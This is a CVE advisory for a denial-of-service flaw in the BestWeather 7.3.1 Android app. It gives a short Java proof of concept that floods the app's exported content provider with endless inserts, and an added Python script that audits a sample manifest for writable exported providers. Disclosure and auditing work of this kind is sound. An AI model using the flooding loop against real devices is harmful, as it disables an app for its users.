CVE-2023-29743: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs
An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause a persistent denial of service attack by manipulating the database.
Denial of Service exists in Alarm Clock for BestWeather (CVE-2023-29743)
Vendor: 最美天气(上海)科技有限公司 (http://www.zmtqsh.com/)
Affected product: BestWeather (com.icoolme.android.weather)
Version: 7.3.1
Download link: https://play.google.com/store/apps/details?id=com.icoolme.android.weather
Description of the vulnerability for use in the CVE: An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause a persistent denial of service attack by manipulating the database.
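PoC:
```java
import android.content.ContentResolver;
import android.content.ContentValues;
import android.net.Uri;

private void attack() {
    // Called from an unauthorized third-party app: inserts rows into the
    // BestWeather content provider in an endless loop.
    while (true) {
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.icoolme.android.weather.provider/EXP");
        ContentValues contentValues = new ContentValues();
        // randomstring is not defined in the original PoC.
        contentValues.put("name", randomstring);
        contentResolver.insert(uri, contentValues);
    }
}
```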
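The PoC depends on another app being able to insert into the provider, so a defender can audit a decoded `AndroidManifest.xml` for providers that are exported without a signature-level write permission. The script below is an added example, not part of the original advisory; the manifest, package name and provider names are constructed and hypothetical, and it assumes a text manifest (for example from apktool) that carries `uses-sdk`.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest with hypothetical names; not the affected app's manifest.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.weather">
  <uses-sdk android:targetSdkVersion="30"/>
  <permission android:name="com.example.weather.WRITE" android:protectionLevel="signature"/>
  <permission android:name="com.example.weather.WEAK" android:protectionLevel="normal"/>
  <application>
    <provider android:name=".OpenProvider" android:authorities="com.example.weather.open"
        android:exported="true"/>
    <provider android:name=".WeakProvider" android:authorities="com.example.weather.weak"
        android:exported="true" android:writePermission="com.example.weather.WEAK"/>
    <provider android:name=".SignedProvider" android:authorities="com.example.weather.signed"
        android:exported="true" android:writePermission="com.example.weather.WRITE"/>
    <provider android:name=".PrivateProvider" android:authorities="com.example.weather.private"/>
  </application>
</manifest>"""


def audit_providers(manifest_xml):
    """Return (authority, reason) for each provider other apps can write to."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    # A missing uses-sdk is treated as an old target (conservative: exported by default).
    target = int(sdk.get(ANDROID + "targetSdkVersion", "1")) if sdk is not None else 1
    # Protection level of each permission this manifest declares; "normal" is the default.
    levels = {p.get(ANDROID + "name"): p.get(ANDROID + "protectionLevel", "normal")
              for p in root.findall("permission")}
    app = root.find("application")
    findings = []
    for prov in app.findall("provider"):
        # Providers are exported by default only when targetSdkVersion < 17.
        exported = prov.get(ANDROID + "exported", "true" if target < 17 else "false")
        if exported != "true":
            continue
        authority = prov.get(ANDROID + "authorities")
        write_perm = (prov.get(ANDROID + "writePermission")
                      or prov.get(ANDROID + "permission") or app.get(ANDROID + "permission"))
        if write_perm is None:
            findings.append((authority, "exported with no write permission"))
        elif "signature" not in levels.get(write_perm, "unknown"):
            findings.append((authority, write_perm + " is not declared signature-level here"))
    return findings


if __name__ == "__main__":
    print(audit_providers(SAMPLE_MANIFEST))
```

A permission declared elsewhere (by the platform or another package) is reported as not signature-level because its protection level cannot be read from this manifest; check those by hand.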